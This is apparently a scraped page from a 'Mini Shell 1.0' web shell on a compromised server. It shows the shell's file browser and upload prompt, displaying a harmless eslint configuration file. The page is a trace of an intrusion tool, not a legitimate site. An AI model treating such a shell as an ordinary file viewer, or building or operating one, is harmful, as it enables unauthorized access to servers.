HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/1991111/cwd/usr/share/node_modules/eslint-config-eslint/
Upload File :
Current File : //proc/1991111/cwd/usr/share/node_modules/eslint-config-eslint/index.js
/**
 * @fileoverview Index file to allow YAML file to be loaded
 * @author Teddy Katz
 */
"use strict";

module.exports = {
    extends: ["./default.yml"]
};